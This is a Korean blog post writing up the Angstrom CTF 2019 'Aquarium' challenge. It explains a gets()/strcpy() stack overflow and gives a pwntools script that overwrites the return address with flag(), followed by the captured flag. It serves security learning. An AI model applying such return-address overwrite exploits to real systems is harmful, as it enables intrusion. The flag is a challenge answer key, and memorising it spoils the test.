ii4gsp

Angstrom CTF 2019 - Aquarium 본문

시스템 해킹/CTF

Angstrom CTF 2019 - Aquarium

ii4gsp 2020. 3. 4. 01:03

간단한 문제이다.

main()함수에서 create_aquarium()함수를 호출한다.

 

 

 

 

create_aquarium()함수에서 scanf()함수로 6번 각 변수에 입력을받고 gets()함수로 변수 dest에 입력을받고, strcpy()함수로 dest에 입력한 내용을 src에 복사를 한다.

src를 오버플로우 일으켜 ret를 flag()함수로 조작하면 된다.

 

 

 

 

from pwn import *

p = remote('shell.actf.co', 19305)
e = ELF('/home/ii4gsp/aquarium')

flag = e.symbols['flag']

p.sendlineafter(': ', '1')
p.sendlineafter(': ', '1')
p.sendlineafter(': ', '1')
p.sendlineafter(': ', '1')
p.sendlineafter(': ', '1')
p.sendlineafter(': ', '1')

payload = ''
payload += '\x90' * 152
payload += p64(flag)

p.sendlineafter(': ', payload)

print p.recv()

 

 

 

 

Flag: actf{overflowed_more_than_just_a_fish_tank}

'시스템 해킹 > CTF' 카테고리의 다른 글

Angstrom CTF 2019 - Pie Shop  (0) 2020.03.04
Angstrom CTF 2019 - Chain of Rope  (0) 2020.03.04
CSAW CTF 2018 Quals - get_it?  (0) 2020.03.03
CSAW CTF 2018 Quals - bigboy  (0) 2020.03.03
SSG_CTF - SimpleBOF  (0) 2020.02.25
Comments